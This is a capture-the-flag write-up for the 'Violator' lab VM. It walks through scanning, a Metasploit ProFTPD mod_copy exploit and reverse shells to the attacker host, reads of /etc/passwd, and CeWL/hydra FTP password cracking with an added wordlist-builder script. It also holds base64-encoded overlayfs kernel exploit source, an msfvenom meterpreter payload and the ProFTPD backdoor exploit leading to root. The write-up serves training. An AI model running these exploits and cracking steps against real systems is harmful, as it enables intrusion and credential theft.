• Write-up-Violator


    About

    • Download: click here
    • Flag: /root/flag.txt
    • Bilibili: video

    Information gathering

    • NIC: VMware vmnet8
    ➜  ~ ip addr show dev vmnet8 
    5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
        link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
        inet 172.16.249.1/24 brd 172.16.249.255 scope global vmnet8
           valid_lft forever preferred_lft forever
        inet6 fe80::250:56ff:fec0:8/64 scope link 
           valid_lft forever preferred_lft forever
    
    ➜  ~ nmap -T4 -A 172.16.249.1/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 08:09 CST
    Nmap scan report for 172.16.249.1
    Host is up (0.00013s latency).
    Not shown: 999 closed ports
    PORT    STATE SERVICE         VERSION
    902/tcp open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
    
    Nmap scan report for 172.16.249.129
    Host is up (0.00035s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     ProFTPD 1.3.5rc3
    80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
    Service Info: OS: Unix
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 256 IP addresses (2 hosts up) scanned in 72.25 seconds
    
    1. IP: 172.16.249.129, Ubuntu, ports 21 and 80 open. The home page has one image and a link to a wiki page, which may be the way in.
    ➜  ~ curl -L http://172.16.249.129/
    <html>
    <title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
      <body>
        <br>I Say.. I say... I say boy!  You're barkin up the wrong tree!</br>
        <img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
       <-- https://en.wikipedia.org/wiki/Violator_(album)  -->
      </body>
    </html>
    
    
    • Not WordPress, so just run nikto over it: nothing found. The EXIF data of foggie.jpg shows nothing either.
    ➜  ~ nikto -h http://172.16.249.129/
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          172.16.249.129
    + Target Hostname:    172.16.249.129
    + Target Port:        80
    + Start Time:         2018-08-06 08:16:20 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.7 (Ubuntu)
    + Server leaks inodes via ETags, header found with file /, fields: 0x13e 0x53518115c6709 
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
    + OSVDB-3233: /icons/README: Apache default file found.
    + 7535 requests: 0 error(s) and 7 item(s) reported on remote host
    + End Time:           2018-08-06 08:16:28 (GMT8) (8 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    1. So the target becomes FTP. nmap reports ProFTPD 1.3.5rc3; check whether that version has known exploits.
    ➜  ~ searchsploit ProFTPD 1.3.5
    -------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
     Exploit Title                                                                                                            |  Path
                                                                                                                              | (/home/kali-team/Kali-Team/exploit-database/)
    -------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
    ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                 | exploits/linux/remote/37262.rb
    ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                       | exploits/linux/remote/36803.py
    ProFTPd 1.3.5 - File Copy                                                                                                 | exploits/linux/remote/36742.txt
    -------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
    

    Exploitation

    • All three entries cover the same flaw, the unauthenticated mod_copy file copy (CVE-2015-3306); the Metasploit module is the most convenient, so use that.
    msf > use exploit/unix/ftp/proftpd_modcopy_exec 
    msf exploit(unix/ftp/proftpd_modcopy_exec) > show options 
    
    Module options (exploit/unix/ftp/proftpd_modcopy_exec):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOST                       yes       The target address
       RPORT      80               yes       HTTP port (TCP)
       RPORT_FTP  21               yes       FTP port
       SITEPATH   /var/www         yes       Absolute writable website path
       SSL        false            no        Negotiate SSL/TLS for outgoing connections
       TARGETURI  /                yes       Base path to the website
       TMPPATH    /tmp             yes       Absolute writable path
       VHOST                       no        HTTP server virtual host
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   ProFTPD 1.3.5
    
    
    msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost 172.16.249.129
    rhost => 172.16.249.129
    msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
    sitepath => /var/www/html
    msf exploit(unix/ftp/proftpd_modcopy_exec) > run 
    
    [*] Started reverse TCP handler on 172.16.249.1:4444 
    [*] 172.16.249.129:80 - 172.16.249.129:21 - Connected to FTP server
    [*] 172.16.249.129:80 - 172.16.249.129:21 - Sending copy commands to FTP server
    [*] 172.16.249.129:80 - Executing PHP payload /O8hgrL.php
    [*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.129:33406) at 2018-08-06 14:10:35 +0800
    
    ls
    O8hgrL.php
    foggie.jpg
    i0KEqK.php
    index.html
    
    • The box is Ubuntu, where Apache 2.4.7's document root is /var/www/html rather than the module default /var/www, so SITEPATH is set accordingly. The two PHP files in the listing are backdoors written by Metasploit; remove them once you are done.
    whoami
    www-data
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    messagebus:x:102:106::/var/run/dbus:/bin/false
    landscape:x:103:109::/var/lib/landscape:/bin/false
    dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
    proftpd:x:104:65534::/var/run/proftpd:/bin/false
    ftp:x:105:65534::/srv/ftp:/bin/false
    mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
    af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
    aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
    uname -a
    Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    
    • There are four ordinary users: dg, mg, af and aw. I tried an exploit on the server: there is a local privilege-escalation vulnerability (used in the escalation section), but www-data cannot use sudo.
    www-data@violator:/var/www/html$ cat /etc/group
    cat /etc/group
    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:syslog,dg
    tty:x:5:
    disk:x:6:
    lp:x:7:
    mail:x:8:
    news:x:9:
    uucp:x:10:
    man:x:12:
    proxy:x:13:
    kmem:x:15:
    dialout:x:20:
    fax:x:21:
    voice:x:22:
    cdrom:x:24:dg
    floppy:x:25:
    tape:x:26:
    sudo:x:27:dg
    audio:x:29:
    dip:x:30:dg
    www-data:x:33:
    backup:x:34:
    operator:x:37:
    list:x:38:
    irc:x:39:
    src:x:40:
    gnats:x:41:
    shadow:x:42:
    utmp:x:43:
    video:x:44:
    sasl:x:45:
    plugdev:x:46:dg
    staff:x:50:
    games:x:60:
    users:x:100:mg,af,aw
    nogroup:x:65534:
    libuuid:x:101:
    netdev:x:102:
    crontab:x:103:
    syslog:x:104:
    fuse:x:105:
    messagebus:x:106:
    mlocate:x:107:
    ssh:x:108:
    landscape:x:109:
    dg:x:1000:
    lpadmin:x:110:dg
    sambashare:x:111:dg
    ssl-cert:x:112:
    mg:x:1001:
    af:x:1002:
    aw:x:1003:
    
    • Only dg is in the sudo group, so look through each user's home directory. That turns up the following.
    www-data@violator:/home/af$ ls
    ls
    minarke-1.21  minarke-1.21.tar.bz2
    www-data@violator:/home/aw$ file hint
    file hint
    hint: ASCII text
    www-data@violator:/home/aw$ cat hint
    cat hint
    You are getting close... Can you crack the final enigma..?
    www-data@violator:/home/aw$ 
    www-data@violator:/home$ ls dg
    ls dg
    bd
    www-data@violator:/home/mg$ file faith_and_devotion
    file faith_and_devotion
    faith_and_devotion: ASCII text
    www-data@violator:/home/mg$ cat faith_and_devotion
    cat faith_and_devotion
    Lyrics:
    
    * Use Wermacht with 3 rotors
    * Reflector to B
    Initial: A B C
    Alphabet Ring: C B A
    Plug Board A-B, C-D
    
    www-data@violator:/home/mg$ 
    
    
    • Copied everything to /var/www/html and downloaded it locally. Then I was stuck; the references meant nothing to me. I went back to the wiki link found earlier and thought of using CeWL to spider that page into a wordlist and brute-force the four users with it. CeWL describes itself as follows. In practice the list I fed to hydra was not the raw CeWL output: I took the album and song titles, removed the spaces and used those as the password list, which is why hydra reports 23 passwords while the pass.txt CeWL produced has 10,429 lines.

    CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

    ➜  CeWL git:(master) ✗ ./cewl.rb -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w pass.txt
    ➜  CeWL git:(master) ✗ cat pass.txt |wc -l
    10429
    ➜  CeWL git:(master) ✗ hydra -L user.txt -P pass.txt -u 172.16.249.129 ftp
    Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:56:59
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 92 login tries (l:4/p:23), ~6 tries per task
    [DATA] attacking ftp://172.16.249.129:21/
    [21][ftp] host: 172.16.249.129   login: aw   password: sweetestperfection
    [21][ftp] host: 172.16.249.129   login: af   password: enjoythesilence
    [21][ftp] host: 172.16.249.129   login: mg   password: bluedress
    [21][ftp] host: 172.16.249.129   login: dg   password: policyoftruth
    ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
    ➜  CeWL git:(master) ✗ 
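
Why CeWL's 10,429 words missed and a 23-entry hand-made list hit, as an added example (not the author's list, which the page does not reproduce): the FTP passwords were song titles lower-cased with the spaces removed, and the RAR password later on was a title kept verbatim, so a per-word spider splits apart exactly the phrases that were used. The block pulls multi-word phrases (quoted strings and Title Case runs) out of page text and emits several joined forms of each. The page text inside it is a constructed stand-in for the wiki article, though the titles it lists are the album's real track listing; the function names are mine.

```python
"""Phrase-based wordlist builder.  Added example for this write-up; SAMPLE_PAGE_TEXT
is constructed to resemble what CeWL spiders from the album's wiki page."""
import re

SAMPLE_PAGE_TEXT = '''
Violator is the seventh studio album by Depeche Mode. The singles "Personal Jesus",
"Enjoy the Silence", "Policy of Truth" and "World in My Eyes" were released from it.
Track listing: "World in My Eyes", "Sweetest Perfection", "Personal Jesus", "Halo",
"Waiting for the Night", "Enjoy the Silence", "Policy of Truth", "Blue Dress", "Clean".
'''

# connector words allowed inside a Title Case run ("Policy of Truth")
SMALL_WORDS = {"a", "an", "and", "the", "of", "in", "for", "my", "to", "on"}


def extract_phrases(text):
    """Quoted strings, then runs of capitalised words with connectors between them.
    These are the multi-word items a per-word spider such as CeWL breaks up."""
    phrases = []

    def add(p):
        p = " ".join(p.split())
        if p and p not in phrases:
            phrases.append(p)

    for quoted in re.findall(r'"([^"]{2,60})"', text):
        add(quoted)

    run = []

    def flush():
        while run and run[-1].lower() in SMALL_WORDS:   # no trailing "of", "the"
            run.pop()
        if len(run) >= 2:                                # single words: CeWL has those
            add(" ".join(run))
        run.clear()

    for tok in re.findall(r"[A-Za-z']+|[^\sA-Za-z']", text):
        if tok[0].isupper():
            run.append(tok)
        elif tok.lower() in SMALL_WORDS and run:
            run.append(tok)
        else:
            flush()                                      # punctuation or lowercase ends a run
    flush()
    return phrases


def mangle(phrase):
    """The joined forms worth trying for one phrase, most likely first."""
    words = phrase.split()
    joined = "".join(words)
    forms = [phrase,                                     # "World in My Eyes" (the RAR password)
             joined.lower(),                             # "worldinmyeyes"    (the FTP passwords)
             joined,                                     # "WorldinMyEyes"
             "".join(w.capitalize() for w in words),     # "WorldInMyEyes"
             joined.upper()]                             # "WORLDINMYEYES"
    out = []
    for f in forms:
        if f not in out:
            out.append(f)
    return out


def build_wordlist(text):
    """Ordered, de-duplicated candidate list ready for hydra -P or john --wordlist."""
    out = []
    for phrase in extract_phrases(text):
        for candidate in mangle(phrase):
            if candidate not in out:
                out.append(candidate)
    return out


if __name__ == "__main__":
    print("\n".join(build_wordlist(SAMPLE_PAGE_TEXT)))
```

Keeping the verbatim form in the list is what lets the same file crack the RAR archive in the last section, whose password kept its spaces and capitals.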
    

    Privilege escalation

    1. The first method is to run the exploit directly. The shell obtained from msf has no upload function, and a one-line PHP webshell didn't seem to work either, so base64-encode exp.c, paste the text into the shell, decode it back to exp.c on the target, then compile and run it. Compare a hash of exp.c on both ends before compiling; a line lost in the paste fails silently. The transcript below is already running as dg, after the su shown in the second method. Exploit 39166 is the overlayfs bug CVE-2015-8660, which this 3.19.0-25 kernel from July 2015 still has.
    ➜  ~ searchsploit -p 39166
      Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
          URL: https://www.exploit-db.com/exploits/39166/
         Path: /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c
    File Type: C source, ASCII text, with CRLF line terminators
    
    ➜  ~ cp /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c exp.c 
    ➜  ~ cat exp.c|base64 
    LyoNCmp1c3QgYW5vdGhlciBvdmVybGF5ZnMgZXhwbG9pdCwgd29ya3Mgb24ga2VybmVscyBiZWZv
    cmUgMjAxNS0xMi0yNg0KDQojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290DQoj
    IERhdGU6IDIwMTYtMDEtMDUNCiMgRXhwbG9pdCBBdXRob3I6IHJlYmVsDQojIFZlcnNpb246IFVi
    dW50dSAxNC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlDQojIFRlc3RlZCBvbjogVWJ1bnR1IDE0LjA0
    IExUUywgMTUuMTANCiMgQ1ZFIDogQ1ZFLTIwMTUtODY2MA0KDQpibGFoQHVidW50dTp+JCBpZA0K
    dWlkPTEwMDEoYmxhaCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTEwMDEoYmxhaCkNCmJsYWhAdWJ1
    bnR1On4kIHVuYW1lIC1hICYmIGNhdCAvZXRjL2lzc3VlDQpMaW51eCB1YnVudHUgMy4xOS4wLTQy
    LWdlbmVyaWMgIzQ4fjE0LjA0LjEtVWJ1bnR1IFNNUCBGcmkgRGVjIDE4IDEwOjI0OjQ5IFVUQyAy
    MDE1IHg4Nl82NCB4ODZfNjQgeDg2XzY0IEdOVS9MaW51eA0KVWJ1bnR1IDE0LjA0LjMgTFRTIFxu
    IFxsDQpibGFoQHVidW50dTp+JCAuL292ZXJsYXlmYWlsDQpyb290QHVidW50dTp+IyBpZA0KdWlk
    PTAocm9vdCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTAocm9vdCksMTAwMShibGFoKQ0KDQoxMi8y
    MDE1DQpieSByZWJlbA0KDQo2MzU0YjRlMjNkYjIyNWI1NjVkNzlmMjI2ZjJlNDllYzBmZTFlMTli
    DQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzY2hlZC5oPg0KI2luY2x1ZGUg
    PHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5j
    bHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMv
    bW91bnQuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1
    ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQuaD4N
    CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvbW91bnQuaD4NCiNpbmNsdWRl
    IDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzaWduYWwuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0K
    I2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPGxpbnV4L3NjaGVkLmg+DQojaW5jbHVkZSA8
    c3lzL3dhaXQuaD4NCg0Kc3RhdGljIGNoYXIgY2hpbGRfc3RhY2tbMTAyNCoxMDI0XTsNCg0Kc3Rh
    dGljIGludA0KY2hpbGRfZXhlYyh2b2lkICpzdHVmZikNCnsNCiAgICBzeXN0ZW0oInJtIC1yZiAv
    dG1wL2hheGhheCIpOw0KICAgIG1rZGlyKCIvdG1wL2hheGhheCIsIDA3NzcpOw0KICAgIG1rZGly
    KCIvdG1wL2hheGhheC93IiwgMDc3Nyk7DQogICAgbWtkaXIoIi90bXAvaGF4aGF4L3UiLDA3Nzcp
    Ow0KICAgIG1rZGlyKCIvdG1wL2hheGhheC9vIiwwNzc3KTsNCg0KICAgIGlmIChtb3VudCgib3Zl
    cmxheSIsICIvdG1wL2hheGhheC9vIiwgIm92ZXJsYXkiLCBNU19NR0NfVkFMLCAibG93ZXJkaXI9
    L2Jpbix1cHBlcmRpcj0vdG1wL2hheGhheC91LHdvcmtkaXI9L3RtcC9oYXhoYXgvdyIpICE9IDAp
    IHsNCglmcHJpbnRmKHN0ZGVyciwibW91bnQgZmFpbGVkLi5cbiIpOw0KICAgIH0NCg0KICAgIGNo
    bW9kKCIvdG1wL2hheGhheC93L3dvcmsiLDA3NzcpOw0KICAgIGNoZGlyKCIvdG1wL2hheGhheC9v
    Iik7DQogICAgY2htb2QoImJhc2giLDA0NzU1KTsNCiAgICBjaGRpcigiLyIpOw0KICAgIHVtb3Vu
    dCgiL3RtcC9oYXhoYXgvbyIpOw0KICAgIHJldHVybiAwOw0KfQ0KDQppbnQNCm1haW4oaW50IGFy
    Z2MsIGNoYXIgKiphcmd2KQ0Kew0KICAgIGludCBzdGF0dXM7DQogICAgcGlkX3Qgd3JhcHBlciwg
    aW5pdDsNCiAgICBpbnQgY2xvbmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7DQogICAg
    c3RydWN0IHN0YXQgczsNCg0KICAgIGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7DQogICAg
    ICAgIGlmKHVuc2hhcmUoQ0xPTkVfTkVXVVNFUikgIT0gMCkNCiAgICAgICAgICAgIGZwcmludGYo
    c3RkZXJyLCAiZmFpbGVkIHRvIGNyZWF0ZSBuZXcgdXNlciBuYW1lc3BhY2VcbiIpOw0KDQogICAg
    ICAgIGlmKChpbml0ID0gZm9yaygpKSA9PSAwKSB7DQogICAgICAgICAgICBwaWRfdCBwaWQgPQ0K
    ICAgICAgICAgICAgICAgIGNsb25lKGNoaWxkX2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAy
    NCksIGNsb25lX2ZsYWdzLCBOVUxMKTsNCiAgICAgICAgICAgIGlmKHBpZCA8IDApIHsNCiAgICAg
    ICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVhdGUgbmV3IG1vdW50IG5h
    bWVzcGFjZVxuIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgICAgICB9DQoN
    CiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVzLCAwKTsNCg0KICAgICAgICB9DQoNCiAg
    ICAgICAgd2FpdHBpZChpbml0LCAmc3RhdHVzLCAwKTsNCiAgICAgICAgcmV0dXJuIDA7DQogICAg
    fQ0KDQogICAgdXNsZWVwKDMwMDAwMCk7DQoNCiAgICB3YWl0KE5VTEwpOw0KDQogICAgc3RhdCgi
    L3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7DQoNCiAgICBpZihzLnN0X21vZGUgPT0gMHg4OWVkKQ0K
    ICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwiLWMiLCJybSAt
    cmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3VpZCgwLDAsMCk7
    b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7DQoNCiAgICBmcHJpbnRmKHN0
    ZGVyciwiY291bGRuJ3QgY3JlYXRlIHN1aWQgOihcbiIpOw0KICAgIHJldHVybiAtMTsNCn0=
    ➜  ~ 
    
    
    • Decode the base64 on the target, then compile and run.
    dg@violator:/var/www/html$ cat exp.txt|base64 -d >exp.c
    cat exp.txt|base64 -d >exp.c
    
    dg@violator:/var/www/html$ gcc exp.c
    gcc exp.c
    dg@violator:/var/www/html$ ls
    ls
    a.out  exp.c  exp.txt  J0dov8.php  jc7gX.php  vMZTOjJ.php
    dg@violator:/var/www/html$ ./a.out
    ./a.out
    root@violator:/var/www/html# id
    id
    uid=0(root) gid=1000(dg) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(dg)
    root@violator:/var/www/html# 
    
    1. The second method: log in to FTP as dg with password policyoftruth, change to /var/www/html and upload a Meterpreter shell.
    • Generate the meterpreter shell; uploading over FTP is just a PUT.
    ➜  ~ msfvenom -p  php/meterpreter_reverse_tcp LPORT=7788 LHOST=172.16.249.1 -f raw -o msf.php
    msf > use exploit/multi/handler 
    msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
    payload => php/meterpreter_reverse_tcp
    msf exploit(multi/handler) > set lport 7788
    lport => 7788
    msf exploit(multi/handler) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 172.16.249.1:7788 
    [*] Meterpreter session 1 opened (172.16.249.1:7788 -> 172.16.249.129:35623) at 2018-08-07 20:36:38 +0800
    
    • This payload has far more features; it is the one I normally use.
    www-data@violator:/var/www/html$ su dg
    su dg
    Password: policyoftruth
    
    dg@violator:/var/www/html$ sudo -l
    sudo -l
    Matching Defaults entries for dg on violator:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    
    User dg may run the following commands on violator:
        (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
    dg@violator:/var/www/html$ 
    
    • sudo -l shows that dg may run /home/dg/bd/sbin/proftpd as root without a password, and this is a separate ProFTPD build that happens to be vulnerable (the backdoored 1.3.3c, which is what the Metasploit module used below targets). Change into /home/dg/bd/sbin/, start proftpd as root through sudo, then exploit it.
    dg@violator:/var/www/html$ cd /home/dg/bd/sbin/
    cd /home/dg/bd/sbin/
    dg@violator:~/bd/sbin$ ls
    ls
    ftpscrub  ftpshut  in.proftpd  proftpd
    dg@violator:~/bd/sbin$ ls -al
    ls -al
    total 564
    drwxr-xr-x  2 root root   4096 Jun  6  2016 .
    drwxr-xr-x 10 root root   4096 Jun  6  2016 ..
    -rwxr-xr-x  1 root root  15976 Jun  6  2016 ftpscrub
    -rwxr-xr-x  1 root root  10456 Jun  6  2016 ftpshut
    lrwxrwxrwx  1 root root      7 Jun  6  2016 in.proftpd -> proftpd
    -rwxr-xr-x  1 root root 537488 Jun  6  2016 proftpd
    dg@violator:~/bd/sbin$ sudo ./proftpd
    sudo ./proftpd
     - setting default address to 127.0.0.1
    localhost - SocketBindTight in effect, ignoring DefaultServer
    dg@violator:~/bd/sbin$ 
    dg@violator:~/bd/sbin$ netstat -antp
    netstat -antp
    (Not all processes could be identified, non-owned process info
     will not be shown, you would have to be root to see it all.)
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -               
    tcp        0      0 172.16.249.129:60704    172.16.249.1:4444       CLOSE_WAIT  -               
    tcp        0      0 172.16.249.129:60705    172.16.249.1:4444       CLOSE_WAIT  -               
    tcp        0      0 172.16.249.129:35623    172.16.249.1:7788       ESTABLISHED 2669/bash       
    tcp6       0      0 :::21                   :::*                    LISTEN      -               
    tcp6       0      0 :::80                   :::*                    LISTEN      -               
    tcp6       0      0 172.16.249.129:80       172.16.249.1:51132      ESTABLISHED -               
    dg@violator:~/bd/sbin$ 
    
    • The daemon is now running and listening on port 2121, but only on 127.0.0.1, so port forwarding through the Meterpreter session is needed: the portfwd below makes 127.0.0.1:2121 on the attacking machine relay to 127.0.0.1:2121 on the target. The reverse payload still connects back out to 172.16.249.1:4444, which works because the target can reach the attacker directly.
    meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
    [*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121
    
    meterpreter > background 
    [*] Backgrounding session 1...
    msf exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
    set payload cmd/unix/bind_perl
    set payload cmd/unix/bind_perl_ipv6
    set payload cmd/unix/generic
    set payload cmd/unix/reverse
    set payload cmd/unix/reverse_bash_telnet_ssl
    set payload cmd/unix/reverse_perl
    set payload cmd/unix/reverse_perl_ssl
    set payload cmd/unix/reverse_ssl_double_telnet
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
    payload => cmd/unix/reverse_perl
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 172.16.249.1
    lhost => 172.16.249.1
    msf exploit(unix/ftp/proftpd_133c_backdoor) > show options 
    
    Module options (exploit/unix/ftp/proftpd_133c_backdoor):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/reverse_perl):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  172.16.249.1     yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf exploit(unix/ftp/proftpd_133c_backdoor) > run 
    
    [-] Exploit failed: The following options failed to validate: RHOST.
    [*] Exploit completed, but no session was created.
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121
    rport => 2121
    msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1
    rhost => 127.0.0.1
    msf exploit(unix/ftp/proftpd_133c_backdoor) > run 
    [*] Started reverse TCP handler on 172.16.249.1:4444 
    [*] 127.0.0.1:2121 - Sending Backdoor Command
    [*] Command shell session 2 opened (172.16.249.1:4444 -> 172.16.249.129:60709) at 2018-08-07 21:05:32 +0800
    
    id
    uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
    
    • That is root; now for the flag.
    python -c 'import pty;pty.spawn("/bin/bash")'
    root@violator:/# ls
    ls
    bin   dev  home        lib    lost+found  mnt  proc  run   srv  tmp  var
    boot  etc  initrd.img  lib64  media       opt  root  sbin  sys  usr  vmlinuz
    root@violator:/# cd /root
    cd /root
    root@violator:/root# ls
    ls
    flag.txt
    root@violator:/root# cat flag.txt
    cat flag.txt
    I say... I say... I say boy! Pumping for oil or something...?
    ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
    root@violator:/root# 
    
    

    Easter egg

    • There is a hidden directory in /root. Download its contents and the archive turns out to be password-protected; the hash file john loads below is the output of rar2john (that step is not shown).
    root@violator:/root# ll
    ll
    total 24
    drwx------  3 root root 4096 Jun 14  2016 ./
    drwxr-xr-x 22 root root 4096 Jun 14  2016 ../
    -rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
    d--x------  2 root root 4096 Jun 14  2016 .basildon/
    -rw-r--r--  1 root root  114 Jun 12  2016 flag.txt
    -rw-r--r--  1 root root  140 Feb 20  2014 .profile
    root@violator:/root# cd .basildon/
    cd .basildon/
    root@violator:/root/.basildon# ls
    ls
    crocs.rar
    root@violator:/root/.basildon# 
    
    ➜  DOWNLOAD john hash --wordlist=/home/kali-team/Kali-Team/password-recovery/CeWL/pass
    Warning: detected hash type "rar", but the string is also recognized as "rar-opencl"
    Use the "--format=rar-opencl" option to force loading these as that type instead
